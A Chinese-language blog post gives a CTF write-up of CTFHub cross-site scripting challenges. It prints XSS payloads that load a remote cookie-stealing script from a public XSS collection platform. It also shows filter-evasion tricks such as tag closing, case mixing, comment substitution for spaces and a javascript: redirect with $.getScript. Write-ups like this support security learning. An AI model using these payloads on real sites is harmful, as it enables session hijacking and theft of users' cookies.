<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="baidu-site-verification" content="code-XwRtMccZ52">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="CTF,Web安全,Writeup,ctfhub,xss,">










<meta name="description" content="前言跨站脚本（Cross-Site Scripting，XSS）是一种经常出现在 WEB 应用程序中的计算机安全漏洞，是由于 WEB 应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码注入到网页中，当其他用户浏览这些网页时，就会执行其中的恶意代码，对受害用户可能采取 Cookies 资料窃取、会话劫持、钓鱼欺骗等各种攻击。 这两天在 CTFHUB 练习了一下 XSS 相关的题">
<meta name="keywords" content="CTF,Web安全,Writeup,ctfhub,xss">
<meta property="og:type" content="article">
<meta property="og:title" content="Write up CTFHUB XSS">
<meta property="og:url" content="http://yoursite.com/2025/08/25/Write-up-CTFHUB-XSS/index.html">
<meta property="og:site_name" content="HandsomeDong - 七里翔">
<meta property="og:description" content="前言跨站脚本（Cross-Site Scripting，XSS）是一种经常出现在 WEB 应用程序中的计算机安全漏洞，是由于 WEB 应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码注入到网页中，当其他用户浏览这些网页时，就会执行其中的恶意代码，对受害用户可能采取 Cookies 资料窃取、会话劫持、钓鱼欺骗等各种攻击。 这两天在 CTFHUB 练习了一下 XSS 相关的题">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/G6NyFRjczC2Q3ok.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/ADTnZ9BRkfjdsIQ.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/x8y7dG6b5lRUgKC.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/zpDfrniK6OCJbSY.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/VWPcxndMjOIfBeT.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/uvyoR8DnilaOkzg.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/l6ocYap1mFEd3Oy.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/3vwxNIQe59nBqZL.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/oMjCD5ORdyL8HVX.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/tZhc5QbGFzXP7ep.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/Tsa3NhyVUXEwIqF.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/SZpr4iyjUhAc52l.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/SyzjU1q3faMVsXA.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/KSArijzC2D97Rwb.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/gpksGzIy5cNhaf7.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/PDt5siSZjIf2xJu.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/nMUk1JmTc64vrHR.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/BGS3JUYQb16PHir.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/BGS3JUYQb16PHir.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/KCUAboxYHRBtg63.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/KixAnIZ4N7GHBOL.png">
<meta property="og:image" content="https://s2.loli.net/2025/08/25/jMhbsr2uED7dZ1w.png">
<meta property="og:updated_time" content="2025-08-25T15:22:41.522Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Write up CTFHUB XSS">
<meta name="twitter:description" content="前言跨站脚本（Cross-Site Scripting，XSS）是一种经常出现在 WEB 应用程序中的计算机安全漏洞，是由于 WEB 应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码注入到网页中，当其他用户浏览这些网页时，就会执行其中的恶意代码，对受害用户可能采取 Cookies 资料窃取、会话劫持、钓鱼欺骗等各种攻击。 这两天在 CTFHUB 练习了一下 XSS 相关的题">
<meta name="twitter:image" content="https://s2.loli.net/2025/08/25/G6NyFRjczC2Q3ok.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: false,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2025/08/25/Write-up-CTFHUB-XSS/">





  <title>Write up CTFHUB XSS | HandsomeDong - 七里翔</title>
  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?2469ff0527604ef1b39380d8690323a3";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">HandsomeDong - 七里翔</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2025/08/25/Write-up-CTFHUB-XSS/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="HandsomeDong">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="HandsomeDong - 七里翔">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Write up CTFHUB XSS</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2025-08-25T21:36:45+08:00">
                2025-08-25
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index">
                    <span itemprop="name">CTF</span>
                  </a>
                </span>

                
                
                  , 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/Web/" itemprop="url" rel="index">
                    <span itemprop="name">Web</span>
                  </a>
                </span>

                
                
                  , 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/Web/Writeup/" itemprop="url" rel="index">
                    <span itemprop="name">Writeup</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>跨站脚本（Cross-Site Scripting，XSS）是一种经常出现在 WEB 应用程序中的计算机安全漏洞，是由于 WEB 应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码注入到网页中，当其他用户浏览这些网页时，就会执行其中的恶意代码，对受害用户可能采取 Cookies 资料窃取、会话劫持、钓鱼欺骗等各种攻击。</p>
<p>这两天在 CTFHUB 练习了一下 XSS 相关的题。</p>
<p><img src="https://s2.loli.net/2025/08/25/G6NyFRjczC2Q3ok.png" alt="image.png"></p>
<h1 id="准备"><a href="#准备" class="headerlink" title="准备"></a>准备</h1><p>XSS 主要分为 <strong>反射型 XSS</strong> 、<strong>存储型 XSS</strong> 和 <strong>DOM XSS</strong> ，大部分 CTF XSS 最终目的都是获取 Cookie ，也就是需要一个服务端接收脚本发送过来的数据。我们可以借助一些 XSS 平台来实现信息接收，也可以自己实现一个服务暴露到公网中。</p>
<p>我这里使用 XSS 平台来接收数据，注册及设置过程不过多赘述，平台地址：<a href="https://xssjs.com/" target="_blank" rel="noopener">https://xssjs.com/</a></p>
<p>在 XSS 平台设置完项目后，即可得到注入的脚本代码，可以看到代码就是会下载并执行 XSS 平台上返回的 JavaScript 代码，那里面的才是真正的恶意代码。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;sCRiPt sRC=//ujs.ci/2li&gt;&lt;/sCrIpT&gt;  // https://ujs.ci/2li 里面有恶意代码</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2025/08/25/ADTnZ9BRkfjdsIQ.png" alt="2.png"></p>
<h1 id="做题"><a href="#做题" class="headerlink" title="做题"></a>做题</h1><h2 id="反射型-XSS"><a href="#反射型-XSS" class="headerlink" title="反射型 XSS"></a>反射型 XSS</h2><p>一打开链接，就能看到两个框。一开始我是一脸懵逼的，看了一下网页代码以及回想了一下 XSS 原理，才大概知道这两个框是什么意思。</p>
<p>第一个框是真实场景中用户的输入框，我们需要通过这个输入来注入恶意脚本；而第二个框则是为 CTF 服务的，CTF 平台后台会有机器人自动请求第二个输入框中的链接，以模仿真实用户的请求。</p>
<p>而我们要做的，就是先通过第一个输入来注入恶意脚本，随后在第二个框输入被注入 XSS 攻击的网站链接，以窃取 CTF 平台后台机器人的 Cookie。</p>
<p><img src="https://s2.loli.net/2025/08/25/x8y7dG6b5lRUgKC.png" alt="1.png"></p>
<p>随便在第一个框中做了一些注入，分析 HTML 源码发现没做任何过滤，那就直接注入我们的代码吧。</p>
<p><img src="https://s2.loli.net/2025/08/25/zpDfrniK6OCJbSY.png" alt="3.png"><br><img src="https://s2.loli.net/2025/08/25/VWPcxndMjOIfBeT.png" alt="4.png"></p>
<p>这很明显是个反射型 XSS ，直接回显 Get 参数里的 name 参数值，把这个链接复制到第二个框中，让机器人请求。</p>
<p><img src="https://s2.loli.net/2025/08/25/uvyoR8DnilaOkzg.png" alt="5.png"></p>
<p>来到 XSS 平台的项目后台，可以看到窃取的信息，flag 就在 Cookie 里面。</p>
<p><img src="https://s2.loli.net/2025/08/25/l6ocYap1mFEd3Oy.png" alt="6.png"></p>
<h2 id="存储型-XSS"><a href="#存储型-XSS" class="headerlink" title="存储型 XSS"></a>存储型 XSS</h2><p>解题步骤和上一题完全一样，这里就不过多赘述了。</p>
<p>不过需要理解存储型 XSS 和反射型 XSS 的区别：</p>
<p>反射型 XSS 的恶意代码一般出现在网站搜索栏、用户登录口的等地方，恶意代码通常在 URL 中，像上一题的 Get 参数里的 name 参数就是如此，当受害者点击这些专门设计的链接时才会中招。</p>
<p>而存储型 XSS 不需要用户单击特定 URL 就能执行跨站脚本，攻击者事先将恶意代码上传或储存到漏洞服务器中，只要受害者浏览包含此恶意代码的页面就会执行恶意代码，存储型 XSS 一般出现在网站留言、评论、博客日志等交互处，恶意脚本存储到客户端或者服务端的数据库中。</p>
<h2 id="DOM-XSS"><a href="#DOM-XSS" class="headerlink" title="DOM XSS"></a>DOM XSS</h2><p>DOM XSS 是基于 DOM 文档对象模型的一种漏洞，JS 可以通过 DOM 动态检查、修改页面内容。如果用户在客户端输入的数据中注入恶意脚本，而脚本没有被过滤，那就可能受到 DOM XSS 攻击。</p>
<p>查看代码可以清楚地看到输入的内容是没有经过任何过滤的，会直接插入到页面中。</p>
<p><img src="https://s2.loli.net/2025/08/25/3vwxNIQe59nBqZL.png" alt="1.png"></p>
<p><img src="https://s2.loli.net/2025/08/25/oMjCD5ORdyL8HVX.png" alt="2.png"></p>
<p>但是这次不能直接输入 &#x3C;&#x73;&#x43;&#x52;&#x69;&#x50;&#x74;&#x20;&#x73;&#x52;&#x43;&#x3D;&#x2F;&#x2F;&#x75;&#x6A;&#x73;&#x2E;&#x63;&#x69;&#x2F;&#x32;&#x6C;&#x69;&#x3E;&#x3C;&#x2F;&#x73;&#x43;&#x72;&#x49;&#x70;&#x54;&#x3E; ，直接输入的效果如下。可以看到输入的内容中含有 script 结束标签，导致原本的标签被提前结束了，最终修改页面的脚本执行失败，所以得考虑怎么正确闭合修改页面脚本的 JS 标签才行。</p>
<p><img src="https://s2.loli.net/2025/08/25/tZhc5QbGFzXP7ep.png" alt="image.png"><br><img src="https://s2.loli.net/2025/08/25/Tsa3NhyVUXEwIqF.png" alt="image.png"></p>
<p>经过思考，输入的内容如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos;;&lt;/script&gt;&lt;sCRiPt sRC=//ujs.ci/2li&gt;&lt;/sCrIpT&gt;</span><br></pre></td></tr></table></figure></p>
<p>最终效果如下，先用 &#x27;&#x3B;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E; 把前面那段脚本的标签闭合，这样后面的 &#x3C;&#x73;&#x43;&#x52;&#x69;&#x50;&#x74;&#x20;&#x73;&#x52;&#x43;&#x3D;&#x2F;&#x2F;&#x75;&#x6A;&#x73;&#x2E;&#x63;&#x69;&#x2F;&#x32;&#x6C;&#x69;&#x3E;&#x3C;&#x2F;&#x73;&#x43;&#x72;&#x49;&#x70;&#x54;&#x3E; 就能正常注入到 HTML 中了。</p>
<p><img src="https://s2.loli.net/2025/08/25/SZpr4iyjUhAc52l.png" alt="image.png"></p>
<p>把链接输入到第二个框中，查看 XSS 平台后台，从 Cookie 中拿到 flag ！</p>
<p><img src="https://s2.loli.net/2025/08/25/SyzjU1q3faMVsXA.png" alt="image.png"></p>
<h2 id="DOM-跳转"><a href="#DOM-跳转" class="headerlink" title="DOM 跳转"></a>DOM 跳转</h2><p>这道题的第一个输入框倒是被锁定了，不允许输入。</p>
<p><img src="https://s2.loli.net/2025/08/25/KSArijzC2D97Rwb.png" alt="1.png"></p>
<p>从网页代码可以看出来，这段脚本会把 GET 参数里的 jumpto 参数值提取出来，使用 location.href 跳转页面（重定向）。</p>
<p><img src="https://s2.loli.net/2025/08/25/gpksGzIy5cNhaf7.png" alt="2.png"></p>
<p>那这里可以使用 javascript: 协议配合 jQuery 的 $.getScript() 来动态加载、执行我的恶意脚本代码。</p>
<blockquote>
<p>在浏览器地址栏或者某些跳转逻辑中，如果 URL 以 javascript:代码开头，浏览器就会把后面的内容当作 JavaScript 来执行。</p>
</blockquote>
<blockquote>
<p>$.getScript(url, callback) 是 jQuery 提供的 API，用于从指定 URL 动态加载并执行一段 JS 文件。</p>
</blockquote>
<p>直接构造链接输入到第二个框中</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?jumpti=javascript:$.getScript(&quot;恶意脚本链接&quot;))</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2025/08/25/PDt5siSZjIf2xJu.png" alt="3.png"></p>
<p>来到 XSS 平台后台，拿到 flag ！</p>
<p><img src="https://s2.loli.net/2025/08/25/nMUk1JmTc64vrHR.png" alt="image.png"></p>
<h2 id="过滤空格"><a href="#过滤空格" class="headerlink" title="过滤空格"></a>过滤空格</h2><p>这道题会把空格过滤掉，我输入 &#x3C;&#x73;&#x43;&#x52;&#x69;&#x50;&#x74;&#x20;&#x73;&#x52;&#x43;&#x3D;&#x2F;&#x2F;&#x75;&#x6A;&#x73;&#x2E;&#x63;&#x69;&#x2F;&#x32;&#x6C;&#x69;&#x3E;&#x3C;&#x2F;&#x73;&#x43;&#x72;&#x49;&#x70;&#x54;&#x3E; 后变成了<br>&#x3C;&#x73;&#x43;&#x52;&#x69;&#x50;&#x74;&#x73;&#x52;&#x43;&#x3D;&#x2F;&#x2F;&#x75;&#x6A;&#x73;&#x2E;&#x63;&#x69;&#x2F;&#x32;&#x6C;&#x69;&#x3E;&#x3C;&#x2F;&#x73;&#x43;&#x72;&#x49;&#x70;&#x54;&#x3E; </p>
<p><img src="https://s2.loli.net/2025/08/25/BGS3JUYQb16PHir.png" alt="2.png"></p>
<p>可以用注释 /**/ 绕过。</p>
<p><img src="https://s2.loli.net/2025/08/25/BGS3JUYQb16PHir.png" alt="2.png"></p>
<h2 id="过滤关键词"><a href="#过滤关键词" class="headerlink" title="过滤关键词"></a>过滤关键词</h2><p>这道题更是把 script 直接过滤掉了</p>
<p><img src="https://s2.loli.net/2025/08/25/KCUAboxYHRBtg63.png" alt="1.png"></p>
<p>尝试用大小写混淆的方式绕过（其实我一开始就是用大小写混淆）</p>
<p><img src="https://s2.loli.net/2025/08/25/KixAnIZ4N7GHBOL.png" alt="2.png"></p>
<h1 id="感想"><a href="#感想" class="headerlink" title="感想"></a>感想</h1><p>昨天我使用 <a href="http://test.xss.tv/" target="_blank" rel="noopener">http://test.xss.tv/</a> 简单练习了一下 XSS ，但是 XSS 最终目的是窃取用户数据，不是简单的 alert(‘xxx’) ，这次结合 XSS 平台了解了通过 XSS 窃取用户数据的完整流程，这不禁让我想起十几二十年前 QQ 空间、QQ 邮箱的 XSS 漏洞，原来是这么一回事啊！怪不得以前 QQ 空间老是中招呢！</p>
<p><img src="https://s2.loli.net/2025/08/25/jMhbsr2uED7dZ1w.png" alt="image.png"></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
            <a href="/tags/Web安全/" rel="tag"># Web安全</a>
          
            <a href="/tags/Writeup/" rel="tag"># Writeup</a>
          
            <a href="/tags/ctfhub/" rel="tag"># ctfhub</a>
          
            <a href="/tags/xss/" rel="tag"># xss</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2025/08/24/XSS攻击练习/" rel="next" title="XSS攻击练习">
                <i class="fa fa-chevron-left"></i> XSS攻击练习
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2025/08/27/Write-up-CTFHUB-web之文件上传/" rel="prev" title="Write up CTFHUB web之文件上传">
                Write up CTFHUB web之文件上传 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="HandsomeDong">
            
              <p class="site-author-name" itemprop="name">HandsomeDong</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">30</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">21</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">23</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://github.com/HandsomeDong" title="github" target="_blank">github</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#准备"><span class="nav-number">2.</span> <span class="nav-text">准备</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#做题"><span class="nav-number">3.</span> <span class="nav-text">做题</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#反射型-XSS"><span class="nav-number">3.1.</span> <span class="nav-text">反射型 XSS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#存储型-XSS"><span class="nav-number">3.2.</span> <span class="nav-text">存储型 XSS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DOM-XSS"><span class="nav-number">3.3.</span> <span class="nav-text">DOM XSS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DOM-跳转"><span class="nav-number">3.4.</span> <span class="nav-text">DOM 跳转</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#过滤空格"><span class="nav-number">3.5.</span> <span class="nav-text">过滤空格</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#过滤关键词"><span class="nav-number">3.6.</span> <span class="nav-text">过滤关键词</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#感想"><span class="nav-number">4.</span> <span class="nav-text">感想</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">HandsomeDong</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        
<div class="busuanzi-count">
  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
